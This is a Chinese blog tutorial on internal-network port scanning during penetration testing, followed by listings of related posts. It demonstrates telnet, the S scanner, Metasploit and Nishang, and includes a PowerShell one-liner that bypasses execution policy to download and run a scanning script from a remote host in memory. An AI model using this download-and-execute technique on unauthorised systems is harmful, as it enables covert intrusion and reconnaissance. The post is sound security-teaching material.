信息收集--端口探测

最新推荐文章于 2024-01-20 11:20:56 发布
最新推荐文章于 2024-01-20 11:20:56 发布
阅读量653 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42918771/article/details/108798763
版权

探测内网端口

1.利用 Telnet 命令进行扫描

Telnet 协议是 TCP/IP 协议族的一员,是 Internet 远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在使用者计算机上使用 Telnet 程序,可以连接到目标服务器。如果只是想快速地探测某主机的某个常规高危端口是否开放,Telnet 命令是最方便的。Telnet 命令的简单使用实例:

显示连接失败,则端口没有开放。跳转到新的界面,加载出服务器信息,表示端口开放 
C:\Windows\Temp>telnet 192.168.3.68 23 
正在连接192.168.3.68...无法打开到主机的连接。 在端口 23: 连接失败

2.利用 S 扫描器

扫描器是早期的一种比较快速的端口扫描工具,特别适合运行在 Windows Sever 2003 以下的平台上,支持大网段扫描。S 扫描器的扫描结果默认保存在其目录下的 result.txt 文件中。推荐 使用 TCP 扫描,命令如下:

S.exe TCP 192.168.3.1 192.168.3.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 /Banner /save

3.利用 Metasploit 端口扫描

Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。

msf5 > search portscan

Matching Modules

#  Name                                              Disclosure Date  Rank    Check  Description
-  ----                                              ---------------  ----    -----  -----------
0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator
1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner

4.PowerSploit 下的 Invoke-portscan.ps1 模块

PowerSploit 中的 Invoke-Portscan.ps1 脚本,且使用无文件形式的扫描

powershell.exe -nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://192.168.100.200/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"

5.Nishang 下的 Invoke-PortScan 模块

Invoke-PortScan 是 Nishang 的端口扫描脚本,用于发现主机、解析主机名、端口扫描,是一个很实用的脚本。

Invoke-PortScan -StartAddress 192.168.3.1 -EndAddress 192.168.3.255 -ResolveHost
BeretSEC
关注
专栏目录
内网渗透(十二)之内网信息收集-内网端口扫描和发现
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-09 871
通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等, 在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。
内网安全-信息收集-内网资源探测-扫描内网存活主机
最新发布
cc123489ll的博客
05-01 1316
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完。
端口探测工具
01-18
该工具适用于安全人员,可以为安全人员在授权测试时减少大量的时间去进行端口探测,该工具强大在于他的全端口探测能力比较强,还有很多有意思的功能自己看吧
基于端口的信息探测-portscan-1.0
weixin_30399155的博客
06-06 75
http://www.tiaozhanziwo.com/archives/174.html 转载于:https://www.cnblogs.com/diyunpeng/p/9146844.html
信息收集--端口
daxi0ng的博客
01-21 990
端口渗透总结 简单介绍 "端口"是英文port的意译,可以认为是设备与外界通讯交流的出口。端口可分为虚拟端口和物理端口。 我们此文所指的端口特指TCP/IP协议中的端口,是逻辑意义上的端口。 一些特定端口默认会开启一些特定服务。 端口信息收集可以帮助我们找到更多目标网站的功能点,更全面地对目标网站进行测试。 端口分类 第一类 公认端口(Well Known Ports):从0到102...
端口探测
weixin_45007073的博客
02-01 1024
前言 端口是设备与外界通信交流的接口。如果把服务器看作一栋房子,那么端口就是可以进出这栋房子的门。不同的端口可以指向不同的服务。所以入侵者想要获取到房子的控制权,势必要先从一个门进入一个房间,再通过这个房间控制整个房子。那么服务器开了几个端口端口后面的服务是什么,这些都是十分重要的信息,可以为入侵者制定详细的入侵计划提供依据。因此端口扫描就显得十分重要。 代码演示 先导入相应的函数库 import sys import socket import optparse import threading imp
商业编程-源码-多线程端口扫描程序2.zip
06-23
6. **结果收集与展示**:扫描结束后,程序会汇总所有线程的结果,可能包括打开的端口号、服务标识等信息,并以适当的方式显示出来,便于用户分析。 这个源码实例对于学习多线程编程和网络扫描技术来说非常有价值。...
第四节 收集端口信息-01
09-15
端口信息收集是指通过工具或在线网站来判断目标机器的端口状态,例如使用nmap、masscan等工具来探测开放的端口。这些工具通过向目标端口发送指定标志位等的数据包,并等待目标返回数据包,以此来判断端口状态。 ...
DiscoverTarget-master_前渗透信息探测工具集-URL采集_一键采集_
09-29
【DiscoverTarget-master】是一款强大的前渗透信息探测工具集,专为网络安全从业者设计,旨在帮助他们在进行网络渗透测试之前快速、高效地收集目标网站的URL信息。这款工具集以"一键采集"为亮点,大大节省了用户在...
端口侦测检测软件
01-15
端口侦测检测软件,检测com端口通讯信息和信号
PortScan(局域网ip搜索)
04-17
本工具是用来搜索指定网段,局域网内存在的地址,纯净版无广告。
端口扫描收集信息
qq_37751425的博客
04-12 310
什么是端口端口分两种: 物理端口:也称接口,如usb端口等。 逻辑端口:指TCP/IP协议中的端口,如用网页浏览器的80端口。 也可理解为端口就是队,操作系统为各个进程分配了不同的队,数据包按照目的端口被推入相应的队中。 ...
端口探测详解
weixin_43211186的博客
08-09 1666
端口的百科定义:端口(port),可以认为是设备与外界通讯交流的出口,端口的范围是从0 到 65535,主机通常通过“IP地址+端口号”来区分不同的服务的端口号在 0~1023之间的为通用端口
扫描某机器占用的端口
江宁山人的专栏
07-14 212
一、安装nmap yum install nmap -y 二、使用nmap nmap localhost #查看主机当前开放的端口 nmap -p 1024-65535 localhost#查看主机端口(1024-65535)中开放的端口 nmap -PS 192.168.21.163 #探测目标主机开放的端口 nmap -PS22,80,3306 192.168.21.163 #探测所列出的目标主机端口 ...
nmap探测端口
m0_74667616的博客
10-28 1218
阿巴阿巴
端口服务探测试验
lalalalala~~
10-27 2074
1.了解端口、服务的概念,及其关系 2.使用命令查看本机端口服务状态 3.使用命令判断目标主机的端口服务 4.使用工具探测目标主机的端口服务 预备知识 端口服务 端口、服务、进程是计算机操作系统中不可缺少的部分,一个进程对应着一个程序,服务和端口常常被联系在一起,一个端口对应着一个服务,例如Web服务默认对应80端口端口 在网络技术中,端口有多种含义。集线器、交换机、路由器的端口指的是连接其他网络设备的接口,如RJ-45端口、Serial端口等。我们所关注的端...
Nmap端口扫描
Ryongao
01-20 2566
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
网络侦察技术:端口扫描与信息收集
如全TCP连接、TCP SYN扫描、TCP FIN扫描、其他TCP扫描方式、UDP扫描,以及网络侦察的不同层次,如目标勘察、活跃点侦察、端口探测、操作系统探测、网络拓扑结构侦察,并提到了Google Hacking等技术用于信息收集。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值